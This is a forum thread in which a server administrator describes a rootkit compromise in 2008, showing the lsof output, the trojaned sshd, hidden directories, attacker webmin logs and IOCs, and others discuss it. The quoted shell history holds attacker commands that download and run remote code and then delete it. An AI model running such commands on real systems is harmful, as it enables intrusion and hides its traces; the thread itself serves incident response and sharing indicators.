Hi Guys,

One of my PVPS' got hacked on the 9th of Feb, and thanks to a flag raised by Abuse today, I looked a bit deeper and found that it'd been rootkit'd. Here's all the junk I found, I suggest you guys check out your boxen and see if you have any of these files...

Peace,

Wade

=================
There was a IRC C&C Bot-client running
root@host [~]# lsof |grep 66.252.28.108
k 7188 root 3u IPv4 81089961 TCP host.com:34322->66.252.28.108:ircd (ESTABLISHED)
root@host [~]# kill 7188
root@host [~]# lsof |grep 66.252.28.108

There was a custom copy of SSHD installed and running, which was capturing passwords.

root@host [/dev]# lsof |grep ssh
sshd 3608 root txt REG 0,94 2350288 60871388 /usr/sbin/sshd2

root@host [/usr/sbin]#
-rwxr-xr-x 1 root root 2350288 Feb 9 11:40 sshd2*
-rwxr-xr-x 1 root root 1567702 Feb 9 11:40 sshd-check-conf*
lrwxrwxrwx 1 root root 5 Feb 9 11:40 sshd -> sshd2*

The password capture was being put in /dev/sauxx
root@host [/dev]# head sauxx
root@210.49.31.177 () [Sat Feb 09 2008 12:13:06 +1100]
root@67.187.23.233 () [Sat Feb 16 2008 08:36:02 +1100]
root@83.170.102.168 () [Sun Feb 17 2008 06:54:19 +1100]

There was a script installed in the crontab
root@host [/etc/.syslogd]# crontab -l

10 10 * * * /etc/.etc/.sshhost/cron/tempdelete.pl

And they were running WEBMIN on port 21374
root@host [/etc/.syslogd]# more /etc/.etc/.sshhost/miniserv.conf
port=21374
root=/etc/.etc/.sshhosts
mimetypes=/etc/.etc/.sshhosts/mime.types
addtype_cgi=internal/cgi
realm=Webmin Server

Looking through the logs of webmin they were doing firewall work, god knows why...

24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/iepngfix.htc HTTP/1.1" 200 1746
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/red.gif HTTP/1.1" 200 159
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/blue.gif HTTP/1.1" 200 168
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/iepngfix.htc HTTP/1.1" 200 1746
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/closed.gif HTTP/1.1" 200 233
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /right.cgi?open=system&open=status HTTP/1.1" 200 1144
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/gohome.gif HTTP/1.1" 200 391
24.24.83.17 - letmein [09/Feb/2008:11:44:43 +1100] "GET /images/stock_quit.gif HTTP/1.1" 200 1084
24.24.83.17 - letmein [10/Feb/2008:07:52:19 +1100] "GET /images/iepngfix.htc HTTP/1.1" 200 1746
24.24.83.17 - letmein [10/Feb/2008:07:52:19 +1100] "GET /firewall/ HTTP/1.1" 200 342164
24.24.83.17 - letmein [10/Feb/2008:07:52:33 +1100] "GET /firewall/edit_rule.cgi?table=0&idx=67 HTTP/1.1" 200 16135
24.24.83.17 - letmein [10/Feb/2008:07:52:37 +1100] "GET /images/left.gif HTTP/1.1 200 635TP/1.1" 200 16146
24.24.83.17 - letmein [10/Feb/2008:07:57:23 +1100] "POST /firewall/save_rule.cgi HTTP/1.1" 302 0
24.24.83.17 - letmein [10/Feb/2008:07:57:24 +1100] "GET /firewall/index.cgi?table=0 HTTP/1.1" 200 342164
24.24.83.17 - letmein [10/Feb/2008:07:57:41 +1100] "GET /firewall/edit_rule.cgi?table=0&idx=77 HTTP/1.1" 200 16147
24.24.83.17 - letmein [10/Feb/2008:07:57:55 +1100] "POST /firewall/save_rule.cgi HTTP/1.1" 302 0
24.24.83.17 - letmein [10/Feb/2008:07:57:57 +1100] "GET /firewall/index.cgi?table=0 HTTP/1.1" 200 342087
24.24.83.17 - letmein [10/Feb/2008:07:58:10 +1100] "GET /firewall/edit_rule.cgi?table=0&idx=89 HTTP/1.1" 200 16144
24.24.83.17 - letmein [10/Feb/2008:07:58:34 +1100] "POST /firewall/save_rule.cgi HTTP/1.1" 302 0
24.24.83.17 - letmein [10/Feb/2008:07:58:36 +1100] "GET /firewall/index.cgi?table=0 HTTP/1.1" 200 341990
24.24.83.17 - letmein [10/Feb/2008:07:59:20 +1100] "GET /firewall/apply.cgi?table=0 HTTP/1.1" 302 0
128.173.40.43 - - [11/Feb/2008:01:41:59 +1100] "GET / HTTP/1.1" 401 1646
128.173.40.43 - letmein [11/Feb/2008:01:44:33 +1100] "GET /firewall/images/before.gif HTTP/1.1" 200 84
128.173.40.43 - letmein [11/Feb/2008:01:44:33 +1100] "GET /firewall/images/up.gif HTTP/1.1" 200 103
128.173.40.43 - letmein [11/Feb/2008:01:44:33 +1100] "GET /firewall/ HTTP/1.1" 200 341990
128.173.40.43 - letmein [11/Feb/2008:01:44:36 +1100] "GET /firewall/images/down.gif HTTP/1.1" 200 108

They created two hidden directories, .etc and .syslogd. It appears .etc was used for webadmin and .syslogd was used for the irc client.
root@host [/etc/.etc]# ls -la
total 40
drwxr-xr-x 6 root root 4096 Feb 9 11:49 ./
drwxr-xr-x 64 root root 12288 Feb 18 01:00 ../
drwxrwxr-x 11 500 500 4096 Feb 11 11:53 .sshd-ssl/
drwx------ 115 root bin 4096 Feb 9 11:45 .sshhost/
drwxr-xr-x 121 root bin 12288 Sep 22 07:29 .sshhosts/
drwxr-xr-x 8 root root 4096 Feb 9 11:39 sshd/

root@host [/etc/.syslogd]# ls -la
total 32
drwx------ 3 500 500 4096 Feb 18 00:14 ./
drwxr-xr-x 64 root root 12288 Feb 18 01:00 ../
drwx------ 2 500 500 4096 Jun 17 2006 CVS/
-rw------- 1 500 500 1370 Jun 17 2006 ircdchk.in
-rwx------ 1 root root 1400 Feb 9 11:52 wm_syslogchk*
-rwx------ 1 500 500 75 Feb 29 2000 wm_syslogd*
root@host [/etc/.syslogd]#

Commands they ran;-
560 cat /proc/cpuinfo
561 exit
562 w
563 cd /etc/
564 mkdir .etc
565 cd .etc
566 wget http://sshd.uv.ro/ridah.jpg ; tar zxvf ridah.jpg ; rm -rf ridah.jpg ; cd sshd ; ./configure ; make ; make install ; cd /var/run ; ls | grep sshd
567 yum install xorg-x11-xauth
568 cd /etc/.etc/
569 cd sshd
570 ./configure ; make ; make install ; cd /var/run ; ls | grep sshd
571 cd /etc/.etc/
572 wget jaist.dl.sourceforge.net/sourceforge/webadmin/webmin-1.370.tar.gz
573 tar -zxf webmin-1.370.tar.gz
574 rm webmin-1.370.tar.gz
575 mv webmin-1.370 .sshhosts
576 cd .sshhostys
577 cd .sshhosts
578 ./setup.sh
579 /etc/init.d/iptables stop
580 /etc/init.d/iptables start
~
626 wget http://www.hotlinkfiles.com/files/989470_kyqt3/k_041050.c;gcc -o k k_041050.c;./k;rm -rf k;rm -rf k_041050.c
627 wget http://www.hotlinkfiles.com/files/989470_kyqt3/k_041050.c;gcc -o k k_041050.c;./k;rm -rf k_041050.c;rm -rf k

Good post... :)

It looks like they were building a zombie to eventually use it as a irc bot ( to ddos )...

But they are a bit stupid. I mean, they installed webmin!! and more, they kept
the logs of it ...

Didi you check the code of their "ssh" you found ? Was it known ?

Do you know how they get in ?

Hi Fred,

I've kept a copy of all their custom goodies. Haven't been able to read their code yet, it's an encrypted binary. I've got quite a few mates in the security industry who enjoy de-assembling rootkits. Will be fun seeing what comes out of it :) I can send a copy to you if you'd like (PM me your e-mail).

I'm pretty sure they got in on the exploit that this thread was created for. The first command run was to check the CPU to make sure that exploit would work on it. If it was just the OS they were after they'd of run uname -a instead, but they went for /proc....

The sshd appears to have come from a Russian site,....part of a Russian botnet no less :)

There's an uncompiled file floating around on hotlink (626 and 627 in the history)..The c file's still there, I just grabbed it......

"This is a IRC based distributed denial of service client." Connects to "linx.rr.nu"

Peace,
--Wade

PS 2am local time, going to bed now. It's been a fun night :)

Yeah, i just read the .c file :)
It's not more than a bot... but he can download, execute ... :)
But that was probably the first step before you get really owned...

Yes, i would like to see the "goodies"... As a student: IT engineering, that's the kind of thing that would never hurt to read...

Pm will be send in a second or two :)